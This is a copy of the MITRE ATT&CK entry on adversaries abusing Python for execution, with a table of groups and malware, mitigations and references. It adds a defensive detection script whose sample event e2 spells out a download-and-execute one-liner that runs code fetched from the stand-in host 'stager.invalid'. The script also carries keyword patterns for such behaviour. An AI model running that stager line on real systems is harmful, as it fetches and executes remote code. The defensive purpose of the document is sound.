T1059.006 Python
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
Item | Value |
---|---|
ID | T1059.006 |
Sub-techniques | T1059.001, T1059.002, T1059.003, T1059.004, T1059.005, T1059.006, T1059.007, T1059.008, T1059.009 |
Tactics | TA0002 |
Platforms | Linux, Windows, macOS |
Permissions required | Administrator, SYSTEM, root |
Version | 1.0 |
Created | 09 March 2020 |
Last Modified | 26 July 2021 |
Procedure Examples
ID | Name | Description |
---|---|---|
G0016 | APT29 | APT29 has developed malware variants written in Python.[39] |
G0067 | APT37 | APT37 has used Python scripts to execute payloads.[37] |
G0087 | APT39 | APT39 has used a command line utility and a network scanner written in Python.[33][34] |
S0234 | Bandook | Bandook can support commands to execute Python-based payloads.[29] |
G0060 | BRONZE BUTLER | BRONZE BUTLER has made use of Python-based remote access tools.[42] |
S0482 | Bundlore | Bundlore has used Python scripts to execute payloads.[28] |
S0631 | Chaes | Chaes has used Python scripts for execution and the installation of additional files.[9] |
S0154 | Cobalt Strike | Cobalt Strike can use Python to perform execution.[12][14][13][15] |
S0369 | CoinTicker | CoinTicker executes a Python script to download its second stage.[18] |
S0492 | CookieMiner | CookieMiner has used Python scripts on the user's system, as well as the Python variant of the Empire agent, EmPyre.[21] |
S0695 | Donut | Donut can generate shellcode outputs that execute via Python.[4] |
G0035 | Dragonfly | Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.[38] |
S0547 | DropBook | DropBook is a Python-based backdoor compiled with PyInstaller.[8] |
G1006 | Earth Lusca | Earth Lusca used Python scripts for port scanning or building reverse shells.[32] |
S0377 | Ebury | Ebury has used Python to implement its DGA.[10] |
S0581 | IronNetInjector | IronNetInjector can use IronPython scripts to load payloads with the help of a .NET injector.[2] |
S0387 | KeyBoy | KeyBoy uses Python scripts for installing files and performing execution.[17] |
S0276 | Keydnap | Keydnap uses Python for scripting to execute additional commands.[16] |
G0094 | Kimsuky | Kimsuky has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collect email data.[43][44] |
S0409 | Machete | Machete is written in Python and is used in conjunction with additional Python scripts.[24][25][26] |
G0095 | Machete | Machete used multiple compiled Python scripts on the victim's system. Machete's main backdoor Machete is also written in Python.[36][24][26] |
S0459 | MechaFlounder | MechaFlounder uses a Python-based payload.[22] |
G0069 | MuddyWater | MuddyWater has used tools developed in Python, including Out1.[45] |
C0014 | Operation Wocao | During Operation Wocao, threat actors' backdoors were written in Python and compiled with py2exe.[46] |
S0428 | PoetRAT | PoetRAT was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.[30] |
S0196 | PUNCHBUGGY | PUNCHBUGGY has used Python scripts.[19] |
S0192 | Pupy | Pupy can use an add-on feature when creating payloads that allows you to create custom Python scripts ("scriptlets") to perform tasks offline (without requiring a session), such as sandbox detection, adding persistence, etc.[1] |
S1032 | PyDCrypt | PyDCrypt, along with its functions, is written in Python.[23] |
S0583 | Pysa | Pysa has used Python scripts to deploy ransomware.[27] |
S0332 | Remcos | Remcos uses Python scripts.[3] |
G0106 | Rocke | Rocke has used Python-based malware to install and spread their coinminer.[35] |
S0692 | SILENTTRINITY | SILENTTRINITY is written in Python and can use multiple Python scripts for execution on targeted systems.[5][6] |
S1035 | Small Sieve | Small Sieve can use Python scripts to execute commands.[7] |
S0374 | SpeakUp | SpeakUp uses Python scripts.[20] |
G0131 | Tonto Team | Tonto Team has used Python-based tools for execution.[31] |
S0647 | Turian | Turian has the ability to use Python to spawn a Unix shell.[11] |
G0010 | Turla | Turla has used IronPython scripts as part of the IronNetInjector toolchain to drop payloads.[2] |
G0128 | ZIRCONIUM | ZIRCONIUM has used Python-based implants to interact with compromised hosts.[40][41] |
Mitigations
ID | Mitigation | Description |
---|---|---|
M1049 | Antivirus/Antimalware | Anti-virus can be used to automatically quarantine suspicious files. |
M1047 | Audit | Inventory systems for unauthorized Python installations. |
M1038 | Execution Prevention | Denylist Python where not required. |
M1033 | Limit Software Installation | Prevent users from installing Python where not required. |
Detection
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0009 | Process | Process Creation |
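The two data components above (Command Execution and Process Creation) are what a detection for this technique actually consumes. The following added example, hypothetical code that is not MITRE's and not part of the ATT&CK page, shows how a triage rule over process-creation events can tie them to the mitigations: an approved-interpreter inventory (M1047 / M1038) so that unexpected `python` images stand out, interpreters launched from user-writable directories, inline code passed with `-c` that references the download-and-execute helpers the description mentions, and a shell being spawned by a Python parent (the Turian behaviour in the table). The allowlist, the directory list, the event field names and the sample events are all constructed for the example.

```python
"""Triage of process-creation events for Python interpreter abuse (T1059.006).

Added, hypothetical detection logic; it is not MITRE's code. Each event is a
dict modelled loosely on a Sysmon Event ID 1 / EDR process-creation record
(image, cmdline, parent_image). The approved-interpreter list, the directory
list and the sample events are all constructed for this example.
"""
from __future__ import annotations

import re
import shlex

# Interpreter paths that an audit (M1047) has inventoried and approved (assumed).
APPROVED_INTERPRETERS = {
    "/usr/bin/python3",
    "/usr/bin/python3.11",
    r"C:\Program Files\Python311\python.exe",
}

# User-writable locations from which an interpreter rarely has a legitimate reason to run.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/",
                   "\\appdata\\local\\temp\\", "\\users\\public\\", "\\downloads\\")

# Interpreter and shell image names; the path separator may be / or \.
PYTHON_IMAGE = re.compile(r"(?:^|[\\/])python(?:\d+(?:\.\d+)?)?(?:\.exe)?$", re.IGNORECASE)
SHELL_IMAGE = re.compile(r"(?:^|[\\/])(?:sh|bash|zsh|dash|cmd\.exe|powershell\.exe|pwsh\.exe)$",
                         re.IGNORECASE)

# Helpers the technique description associates with download-and-execute behaviour.
DOWNLOAD_EXEC_HINTS = ("urllib", "requests", "socket", "http.client", "ftplib", "exec(", "subprocess")


def is_python(image: str) -> bool:
    """True when the process image is a CPython interpreter binary."""
    return bool(PYTHON_IMAGE.search(image))


def argv_of(cmdline: str) -> list[str]:
    """Split a command line into arguments, keeping Windows backslashes intact."""
    try:
        parts = shlex.split(cmdline, posix=False)   # non-POSIX mode keeps quotes and backslashes
    except ValueError:                              # unbalanced quotes: crude fallback
        parts = cmdline.split()
    return [p.strip("\"'") for p in parts]


def triage_event(event: dict) -> list[str]:
    """Return the reasons an event is worth a look; an empty list means nothing to flag."""
    reasons: list[str] = []
    image = event["image"]
    if is_python(image):
        if image not in APPROVED_INTERPRETERS:
            reasons.append("interpreter not in approved inventory")
        if any(d in image.lower() for d in SUSPICIOUS_DIRS):
            reasons.append("interpreter launched from user-writable directory")
        argv = argv_of(event["cmdline"])
        if "-c" in argv:
            reasons.append("inline code via -c")
            idx = argv.index("-c") + 1
            code = argv[idx] if idx < len(argv) else ""
            if any(hint in code for hint in DOWNLOAD_EXEC_HINTS):
                reasons.append("inline code references download/execute helpers")
    elif SHELL_IMAGE.search(image) and is_python(event.get("parent_image", "")):
        reasons.append("shell spawned by a Python interpreter")
    return reasons


def triage(events) -> list[dict]:
    """Run triage_event over a stream of events and keep only the flagged ones."""
    return [{"id": e["id"], "reasons": r} for e in events if (r := triage_event(e))]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": "e1", "image": "/usr/bin/python3", "parent_image": "/usr/lib/systemd/systemd",
     "cmdline": "/usr/bin/python3 /opt/app/worker.py --queue jobs"},
    {"id": "e2", "image": "/tmp/.x/python3", "parent_image": "/bin/bash",
     "cmdline": "/tmp/.x/python3 -c \"import urllib.request; "
                "exec(urllib.request.urlopen('http://stager.invalid/s').read())\""},
    {"id": "e3", "image": r"C:\Program Files\Python311\python.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "\"C:\\Program Files\\Python311\\python.exe\" -c \"print(1)\""},
    {"id": "e4", "image": "/bin/sh", "parent_image": "/usr/bin/python3",
     "cmdline": "/bin/sh -c id"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["id"], "->", "; ".join(finding["reasons"]))
```

Run stand-alone, e1 (an approved interpreter running a script from an application directory) produces nothing, e2 collects all four reasons, e3 is flagged only for `-c`, and e4 is flagged because the shell's parent is the interpreter. In practice `-c` on an approved interpreter is a low-severity signal on its own, so the number of reasons (or a weight per reason) is what should drive alert priority, and the approved-interpreter set should be generated from the M1047 inventory rather than hand-maintained.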
References
- Reichel, D. (2021, February 19). IronNetInjector: Turla's New Malware Loading Tool. Retrieved February 24, 2021.
- Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.
- Salvati, M. (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022.
- Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022.
- NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.
- Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.
- Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.
- Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update. Retrieved February 10, 2021.
- Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021.
- Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.
- Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.
- Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who's Your Daddy? Retrieved June 4, 2019.
- Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
- Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018.
- Hulcoop, A., et al. (2016, November 17). It's Parliamentary: KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.
- Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.
- Gorelik, M. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.
- Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
- Chen, Y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges' Cookies. Retrieved July 22, 2020.
- Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
- Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022.
- ESET. (2019, July). MACHETE JUST GOT SHARPER: Venezuelan government institutions under attack. Retrieved September 13, 2019.
- Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.
- kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.
- CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021.
- Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.
- Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.
- Mercer, W., et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.
- Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.
- Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca's Operations. Retrieved July 1, 2022.
- Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.
- FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.
- Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
- The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.
- Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
- US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
- Symantec Security Response. (2015, July 13). "Forkmeiamfamous": Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015.
- Huntley, S. (2020, October 16). How We're Tackling Evolving Online Threats. Retrieved March 24, 2021.
- Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.
- Chen, J., et al. (2019, November). Operation ENDTRADE: TICK's Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
- CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.
- KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022.
- Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
- Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China's hidden hacking groups. Retrieved October 8, 2020.